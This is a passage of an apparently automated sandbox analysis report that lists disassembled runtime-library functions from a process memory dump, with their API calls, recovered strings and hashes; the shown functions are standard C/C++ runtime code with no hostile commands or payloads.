                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6A54E2AA3,?,?,00000000,00007FF6A54DF5AA,?,?,?,00007FF6A54DF085), ref: 00007FF6A54E2921
                                                                • GetLastError.KERNEL32(?,?,?,00007FF6A54E2AA3,?,?,00000000,00007FF6A54DF5AA,?,?,?,00007FF6A54DF085), ref: 00007FF6A54E292F
                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6A54E2AA3,?,?,00000000,00007FF6A54DF5AA,?,?,?,00007FF6A54DF085), ref: 00007FF6A54E2959
                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6A54E2AA3,?,?,00000000,00007FF6A54DF5AA,?,?,?,00007FF6A54DF085), ref: 00007FF6A54E29C7
                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6A54E2AA3,?,?,00000000,00007FF6A54DF5AA,?,?,?,00007FF6A54DF085), ref: 00007FF6A54E29D3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                • String ID: api-ms-
                                                                • API String ID: 2559590344-2084034818
                                                                • Opcode ID: 8850ed367ad2d2661b35613ed2634f1a61761a1f19c6c9ecbc9d02f3acf48630
                                                                • Instruction ID: 82f4314e213e43da8e703e17b746edd4e0a2c8fc18763422c3a8558c0f8c6b51
                                                                • Opcode Fuzzy Hash: 8850ed367ad2d2661b35613ed2634f1a61761a1f19c6c9ecbc9d02f3acf48630
                                                                • Instruction Fuzzy Hash: 5631AD21B1F74295EE55DB12A8006B96394FF47FA4F991535ED6D8B380EF3CE8448700
                                                                Function 00007FF6A54BECB4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 66COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • :AM:am:PM:pm, xrefs: 00007FF6A54BED85
                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF6A54BED67
                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF6A54BED26
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Maklocstr
                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                • API String ID: 2987148671-35662545
                                                                • Opcode ID: 491fbdc8b27c632f473100e7b893b2012ae59e024739ff7ede600f62a4538336
                                                                • Instruction ID: cf174857236475d01ee88b88b507d355fece378100d6778682db975caec3631f
                                                                • Opcode Fuzzy Hash: 491fbdc8b27c632f473100e7b893b2012ae59e024739ff7ede600f62a4538336
                                                                • Instruction Fuzzy Hash: 7F214F26A0AB4585EB10EB21E4412AD77A5FB8AF80F498235DF4D83796DF3CE952C340
                                                                Function 00007FF6A54F38C4 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Value$ErrorLast
                                                                • String ID:
                                                                • API String ID: 2506987500-0
                                                                • Opcode ID: cce916f632552c727b67fcfdadb34d9da5b300b22d40e61ab8f623369a31ee8f
                                                                • Instruction ID: c37465fb698e31f6791aebd3875e94fc30da3b4b87c49ba355607ce7106d5f9e
                                                                • Opcode Fuzzy Hash: cce916f632552c727b67fcfdadb34d9da5b300b22d40e61ab8f623369a31ee8f
                                                                • Instruction Fuzzy Hash: 66215B24A0F28243FA6DE739A6455395242EF47FB0F154634E97E8B6D6DE6CAC094700
                                                                Function 00007FF6A5504228 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                • String ID: CONOUT$
                                                                • API String ID: 3230265001-3130406586
                                                                • Opcode ID: 0aa2eead29613c64221a8d04dc2377f85f71da919e83e1575b9bdb53bd8f400c
                                                                • Instruction ID: bf0bf23b04239f3529e78d445633196476d6b8260c5fb632467d01df93e0b6ca
                                                                • Opcode Fuzzy Hash: 0aa2eead29613c64221a8d04dc2377f85f71da919e83e1575b9bdb53bd8f400c
                                                                • Instruction Fuzzy Hash: E0119D25B29A428AE750DB52E84432967A0FB8AFE9F000235EA5EC7794CF7CDC048740
                                                                Function 00007FF6A54BC8B8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 17libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule
                                                                • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                • API String ID: 667068680-1047828073
                                                                • Opcode ID: 221e068b16366434f1d0638fdc9193794eda2090b996d2bddc54cd5b93809dff
                                                                • Instruction ID: 673b5f0a9099c65e807921b51b5935b81de8a2056343289bb40c2738deb95dbd
                                                                • Opcode Fuzzy Hash: 221e068b16366434f1d0638fdc9193794eda2090b996d2bddc54cd5b93809dff
                                                                • Instruction Fuzzy Hash: 09E07DACE2BA0795EA04EBA1A8554602364BF4AF65F444436C81E87364EF6C9995C360
                                                                Function 00007FF6A54DCD20 Relevance: 9.2, APIs: 6, Instructions: 239COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$CompareInfoString
                                                                • String ID:
                                                                • API String ID: 2984826149-0
                                                                • Opcode ID: c7ff292a73157add0fb76e898066dc175f59218672ecabb4c1380f991fe55015
                                                                • Instruction ID: 0348a5797d1db31c9d3e9738dbe8be13c17cef6c3575a0f4433cf25f82bf93c6
                                                                • Opcode Fuzzy Hash: c7ff292a73157add0fb76e898066dc175f59218672ecabb4c1380f991fe55015
                                                                • Instruction Fuzzy Hash: 66A1A263B0EA8286EB22CB2494543B967D1EF86F98F444635DA5D877C6DF3CEC458340
                                                                Function 00007FF6A54BC940 Relevance: 9.2, APIs: 6, Instructions: 206COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiStringWide
                                                                • String ID:
                                                                • API String ID: 2829165498-0
                                                                • Opcode ID: be977926f54e8f99678e66b6dfed3aaa2fea12904ec4e2e7909252ac35aba288
                                                                • Instruction ID: 976b10a4fe267c85ab43d5fe1f9c9526dd59d87adab859dae87e988b7641e439
                                                                • Opcode Fuzzy Hash: be977926f54e8f99678e66b6dfed3aaa2fea12904ec4e2e7909252ac35aba288
                                                                • Instruction Fuzzy Hash: 3C81BF72A0AB4286EB20DF64A48026D73A5FB56FE8F154635EA5D87BC6DF3CD8018700
                                                                Function 00007FF6A54E8514 Relevance: 9.2, APIs: 6, Instructions: 157COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 3215553584-0
                                                                • Opcode ID: 51887e40b81f6b9dcb2a3f2792477ec99a994f664744b9fb1afaed4a08f7a9d9
                                                                • Instruction ID: 0cf146a6d0b919cde7a7ed444cbffecd7a520ca188471e9cd12902a0e7b13d0e
                                                                • Opcode Fuzzy Hash: 51887e40b81f6b9dcb2a3f2792477ec99a994f664744b9fb1afaed4a08f7a9d9
                                                                • Instruction Fuzzy Hash: 13515E2290E68695EF52DF2494602FD3BA1EB43F48F588471CF8D87396DE2DAC46C702
                                                                Function 00007FF6A54E0440 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 3523768491-393685449
                                                                • Opcode ID: c5fc86108eb9f4d39f3ddcd34d437f5d6ef7e4a552dee04ad6716edea358470b
                                                                • Instruction ID: 6672ca8e4a806e54af3dd3817323faa91039bbf02c2a7513b1c3e43beab1eab6
                                                                • Opcode Fuzzy Hash: c5fc86108eb9f4d39f3ddcd34d437f5d6ef7e4a552dee04ad6716edea358470b
                                                                • Instruction Fuzzy Hash: 2AE17E7390A6828AE720DF25D4803ED3BA0FB57B58F144135DE9D97A96DF38E985CB00
                                                                Function 00007FF6A54F3A3C Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000,00007FF6A54FD4DB,?,?,?), ref: 00007FF6A54F3A4B
                                                                • FlsSetValue.KERNEL32(?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000,00007FF6A54FD4DB,?,?,?), ref: 00007FF6A54F3A81
                                                                • FlsSetValue.KERNEL32(?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000,00007FF6A54FD4DB,?,?,?), ref: 00007FF6A54F3AAE
                                                                • FlsSetValue.KERNEL32(?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000,00007FF6A54FD4DB,?,?,?), ref: 00007FF6A54F3ABF
                                                                • FlsSetValue.KERNEL32(?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000,00007FF6A54FD4DB,?,?,?), ref: 00007FF6A54F3AD0
                                                                • SetLastError.KERNEL32(?,?,00007E89DF901C4E,00007FF6A54E7B89,?,?,?,?,00007FF6A54F3EC2,?,?,00000000,00007FF6A54FD4DB,?,?,?), ref: 00007FF6A54F3AEB
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Value$ErrorLast
                                                                • String ID:
                                                                • API String ID: 2506987500-0
                                                                • Opcode ID: 27d77956a10e90ab490f0c721eba82fc7909f63d3c8e08e5310a8756c397005d
                                                                • Instruction ID: 21f88aa6ab6007ef8c7a2a95df1f709942b73c29e08a5002e9bd15e9fbd02569
                                                                • Opcode Fuzzy Hash: 27d77956a10e90ab490f0c721eba82fc7909f63d3c8e08e5310a8756c397005d
                                                                • Instruction Fuzzy Hash: 3F114A24E0F24242FA59E76AA69503A6242EF46FB0F054738E83E877D6DE6CEC494710
                                                                Function 00007FF6A54BBCE0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 159COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ctypestd::ios_base::failure::failurestd::make_error_code
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 3792656898-1866435925
                                                                • Opcode ID: fbfb89558d0a17bf34c80106cecc880b6de4e3a01342ff032f17d40910d8e845
                                                                • Instruction ID: ed070272a231172839b897e72349a53f22393beb22edc4da18da04cc72d3ec4e
                                                                • Opcode Fuzzy Hash: fbfb89558d0a17bf34c80106cecc880b6de4e3a01342ff032f17d40910d8e845
                                                                • Instruction Fuzzy Hash: 23618D3260AA869AEB50DF29D4803AD37A4FB45F88F454032EB4D87B6ADF3DD855C310
                                                                Function 00007FF6A54CA370 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Maklocstr$Getvals
                                                                • String ID: false$true
                                                                • API String ID: 3025811523-2658103896
                                                                • Opcode ID: d93070d2a64ccebe3fb8e75912a707a1e32fe0ada422d9842361ea70ddb92595
                                                                • Instruction ID: 7b8d7a7817a7f8fe33a72ccb9d33d11657e347ce945534f90d46ca50c81b01b8
                                                                • Opcode Fuzzy Hash: d93070d2a64ccebe3fb8e75912a707a1e32fe0ada422d9842361ea70ddb92595
                                                                • Instruction Fuzzy Hash: 03416936B09B8199F710DF74E4401ED33B1FB99B48B415226EE4D67A4AEF38D99AC340
                                                                Function 00007FF6A54B16F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::make_error_code.LIBCPMTD ref: 00007FF6A54B17A8
                                                                • std::ios_base::failure::failure.LIBCPMTD ref: 00007FF6A54B17BA
                                                                  • Part of subcall function 00007FF6A54DE318: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6A54DDB83), ref: 00007FF6A54DE368
                                                                  • Part of subcall function 00007FF6A54DE318: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6A54DDB83), ref: 00007FF6A54DE3A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFileHeaderRaisestd::ios_base::failure::failurestd::make_error_code
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 1846417002-1866435925
                                                                • Opcode ID: 78cef2a9afe0b937c80230caf7cbd67644b82806d9d59776d326b93e520df914
                                                                • Instruction ID: 04a52370b51833303c0dfdf31aa7d90b17f8328029c5c098f0f6b442a4cad7a6
                                                                • Opcode Fuzzy Hash: 78cef2a9afe0b937c80230caf7cbd67644b82806d9d59776d326b93e520df914
                                                                • Instruction Fuzzy Hash: A4216A32A0EB829AE760DB14E44166E77A0F789B84F544035E6CDC3BAADF3CD904CB04
                                                                Function 00007FF6A54D62F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: std::ios_base::failure::failurestd::make_error_code
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 337632640-1866435925
                                                                • Opcode ID: 1196825653b927798f1895748cbfed1d3d2bc0b462b5051efe7998ace02aad85
                                                                • Instruction ID: 8e1a94dae5cd2de6e95e315d6fe525987beeb2feeac946e8caa9442a7e019844
                                                                • Opcode Fuzzy Hash: 1196825653b927798f1895748cbfed1d3d2bc0b462b5051efe7998ace02aad85
                                                                • Instruction Fuzzy Hash: AFF028A2A1B60A96FF44DB00E4426F52360FB51B48F940431D60D875A6DF3CE90AC341
                                                                Function 00007FF6A54BBBC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: std::ios_base::failure::failurestd::make_error_code
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 337632640-1866435925
                                                                • Opcode ID: f77470be03ffc2e228dc63f3974c499a890b9becc41ccba0fc7a39c00e8bc535
                                                                • Instruction ID: d3e4de56969b99f96ca5187c02772ced6d988ac098664ae6e96e9598a82ea4ee
                                                                • Opcode Fuzzy Hash: f77470be03ffc2e228dc63f3974c499a890b9becc41ccba0fc7a39c00e8bc535
                                                                • Instruction Fuzzy Hash: 10F0F6B1E1F90A96FA44EB00D4466F92330EF61B44F854431D64DC69ABEF3CD945C341
                                                                Function 00007FF6A54F00A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 37b341b9e68ca2947967fc6e98ff1dce805f9c5796a89e283bc6a4e4ae7836e5
                                                                • Instruction ID: bc4ebce3d7eecb0be2a25050f68d4b24c6df04fcd74bd7cb00b96ef739a0b497
                                                                • Opcode Fuzzy Hash: 37b341b9e68ca2947967fc6e98ff1dce805f9c5796a89e283bc6a4e4ae7836e5
                                                                • Instruction Fuzzy Hash: 3CF06265B2AB0685FF14CB28E8453795720EF86F65F540636C96E861E4CF2DDC48C740
                                                                Function 00007FF6A54DF840 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AdjustPointer
                                                                • String ID:
                                                                • API String ID: 1740715915-0
                                                                • Opcode ID: 0878affc78bd18bd4d18787875569a156cd14996a9b246bc248bbbc5629d56dc
